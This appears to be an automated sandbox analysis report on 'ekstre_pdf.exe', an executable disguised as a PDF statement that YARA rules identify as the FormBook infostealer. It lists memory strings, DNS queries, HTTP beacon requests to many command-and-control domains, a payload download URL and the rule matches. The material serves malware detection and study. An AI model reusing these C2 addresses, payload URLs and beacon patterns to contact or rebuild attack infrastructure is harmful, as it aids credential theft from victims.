Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xqan.net/mi94/www.anjin98.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xqan.netReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zetuinteriors.africa
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zetuinteriors.africa/mi94/
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zetuinteriors.africa/mi94/www.bellvaniamail.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zetuinteriors.africa/mi94/www.luivix.online
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zetuinteriors.africaReferer:
Source: explorer.exe, 00000002.00000000.2967197468.000000000D033000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131449854.000000000D033000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.2956783769.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7570471488.000000000906A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3115944708.0000000008FC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440741929.0000000009069000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000002.00000000.2967197468.000000000D033000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131449854.000000000D033000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2967197468.000000000D033000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131449854.000000000D033000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS)A
Source: explorer.exe, 00000002.00000000.2967197468.000000000D033000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131449854.000000000D033000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSp
Source: explorer.exe, 00000002.00000002.7558692050.0000000002A80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2947016680.0000000002A80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000002.7558692050.0000000002A80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2947016680.0000000002A80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/#Oi
Source: explorer.exe, 00000002.00000000.2956783769.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3115944708.0000000008FC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2956783769.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7570471488.000000000906A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3115944708.0000000008FC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440741929.0000000009069000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?UZ
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000002.7558692050.0000000002A80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2947016680.0000000002A80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?1
Source: explorer.exe, 00000002.00000002.7570471488.0000000009117000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440741929.0000000009117000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3115944708.0000000009117000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6279125118.0000000009117000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2956783769.0000000009117000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/
Source: explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/(
Source: explorer.exe, 00000002.00000000.2956783769.0000000008EE2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mx
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 00000002.00000000.2982280367.000000001051F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.000000001051F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com3:
Source: ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000003.3120593751.000000000D071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7582298949.000000000D071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6444343830.000000000D071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.come
Source: explorer.exe, 00000002.00000002.7600570476.00000000119EF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000004.00000002.7565262572.0000000003A8F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sedo.com/search/details/?partnerid=14453&language=d&domain=dinero.news&origin=pa
Source: explorer.exe, 00000002.00000002.7600570476.00000000119EF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000004.00000002.7565262572.0000000003A8F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sedo.com/search/details/?partnerid=14453&language=d&domain=dinero.news&origin=parking&utm_me
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000002.00000002.7553521751.0000000000497000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2943488952.0000000000497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/X
Source: explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comj
Source: explorer.exe, 00000002.00000003.4902671555.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6433528266.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6271035859.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7596616197.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2943488952.0000000000575000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4295188799.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7553521751.0000000000575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: cmd.exe, 00000004.00000002.7565262572.0000000003A8F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: unknown

DNS traffic detected: queries for: www.anotherworldrecord.com

Source: global traffic	HTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mi94/?3fK0g=JxoL4&_N6l56=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H HTTP/1.1Host: www.anotherworldrecord.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4 HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?3fK0g=JxoL4&_N6l56=LeCW5t9GBpp13S/smyYBZwUJrQK0nALdrBEabX8clafx5ylIWBgD8qg00KMKKouA0nKe HTTP/1.1Host: www.jewelry2adore.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?3fK0g=JxoL4&_N6l56=LeCW5t9GBpp13S/smyYBZwUJrQK0nALdrBEabX8clafx5ylIWBgD8qg00KMKKouA0nKe HTTP/1.1Host: www.jewelry2adore.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?_N6l56=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&3fK0g=JxoL4 HTTP/1.1Host: www.licensescape.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?3fK0g=JxoL4&_N6l56=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23 HTTP/1.1Host: www.jenniferfalconerrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?_N6l56=RQIqCfU6yca9MG4/XS5zNeloaytkpqyXcIIi0Y1m1ICwL0CZtYYawds0pYmBK3GbRdzS&3fK0g=JxoL4 HTTP/1.1Host: www.xqan.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?3fK0g=JxoL4&_N6l56=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX HTTP/1.1Host: www.anjin98.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?3fK0g=JxoL4&_N6l56=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL HTTP/1.1Host: www.furniture-42269.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?3fK0g=JxoL4&_N6l56=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW HTTP/1.1Host: www.iltuosentiero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?_N6l56=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&3fK0g=JxoL4 HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?3fK0g=JxoL4&_N6l56=RrYIP0/eJgYl3SedIjrrJhoixcqEaFywGW8DIhJA710ua/O2pKo7Jyh/i2knDDaGCnub HTTP/1.1Host: www.dinero.newsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?_N6l56=8SnTfj2AQcnQtN4WDHIwCOlzimaS2RQBhEdsYDfeFz6xJnDvY5Rr8DAdiOtS6w9Ok+SP&hRrP=w48pM HTTP/1.1Host: www.athle91.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?hRrP=w48pM&_N6l56=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX HTTP/1.1Host: www.anjin98.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056DE

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.7576128335.000000000AEC7000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: Process Memory Space: ekstre_pdf.exe PID: 3132, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: ekstre_pdf.exe

Source: ekstre_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
